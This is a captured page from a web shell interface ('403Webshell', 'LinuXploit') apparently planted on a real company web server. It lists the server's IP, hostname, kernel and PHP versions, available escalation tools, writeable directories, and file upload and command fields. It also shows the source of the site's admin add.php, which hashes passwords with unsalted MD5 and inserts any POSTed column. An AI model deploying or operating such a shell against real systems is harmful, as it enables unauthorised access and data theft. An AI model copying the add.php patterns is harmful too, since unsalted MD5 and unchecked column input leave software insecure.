403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/onesupportsys.onesolution.hk/user/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/onesupportsys.onesolution.hk/user/add.php
<?php
global $dbh;

//-----------------------------------------------------------------------------
// Check permission
//-----------------------------------------------------------------------------
if (!Util::isAdmin()) {
	redirectAndExit('index.php?message=No permission!');
}

//-----------------------------------------------------------------------------
// Define staff
//-----------------------------------------------------------------------------
$staff = array(
	'actived' => 1,
	'deleted' => 0,
	'role' => 3,
);

//-----------------------------------------------------------------------------
// Save if POST method
//-----------------------------------------------------------------------------
if (isPost()) {
	$sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = (SELECT DATABASE()) AND table_name = ?";
	$parameters = array('sys_login');
	if (!($sth = $dbh->prepare($sql))) {
		throw new Exception("sql prepare statement failure: $sql");
	}
	$sth->setFetchMode(PDO::FETCH_ASSOC);
	if (!$sth->execute($parameters)) {
		throw new Exception("sql execute statement failure: $sql");
	}
	$columns = $sth->fetchAll();
	
	foreach ($columns as $column) {
		$column = $column['column_name'];
		if (isset($_POST[$column])) {
			switch ($column) {
				case 'loginpw': {
					if (!empty($_POST[$column])) {
						$staff[$column] = md5($_POST[$column]);
					}
					break;
				}
				default: {
					$staff[$column] = $_POST[$column];
					break;
				}
			}
		}
	}
	
	// Append record time
	$now = date("Y-m-d H:i:s");
	$staff = array_merge($staff, array(
		'createdate' => $now,
		'createby' => $_SESSION['webadmin']['id'],
		'lastupdate' => $now,
		'lastupby' => $_SESSION['webadmin']['id'],
	));
	
	// Create staff
	$columns = array();
	$values = array();
	$parameters = array();
	foreach ($staff as $column => $value) {
		$columns[] = $column;
		$parameters[] = !strlen($value) ? null : $value;
		$values[] = '?';
	}
	$sql = "INSERT sys_login (" . implode(', ', $columns) . ") VALUES (" . implode(', ', $values) . ")";
	if (!($sth = $dbh->prepare($sql))) {
		throw new Exception("sql prepare statement failure: $sql");
	}
	$sth->setFetchMode(PDO::FETCH_ASSOC);
	if (!$sth->execute($parameters)) {
		throw new Exception("sql execute statement failure: $sql");
	}
	$staff['id'] = $dbh->lastInsertId();


	
	$data = array(
		'message' => 'Saved',
	);
	redirectAndExit(Util::link(__DIR__ . '/index.php') . '?' . http_build_query($data));
}

//-----------------------------------------------------------------------------
// Return array parameters
//-----------------------------------------------------------------------------
return array(
	'staff' => $staff,
	'roleOptions' => Staff::roleOptions(),
);

Youez - 2016 - github.com/yon3zu
LinuXploit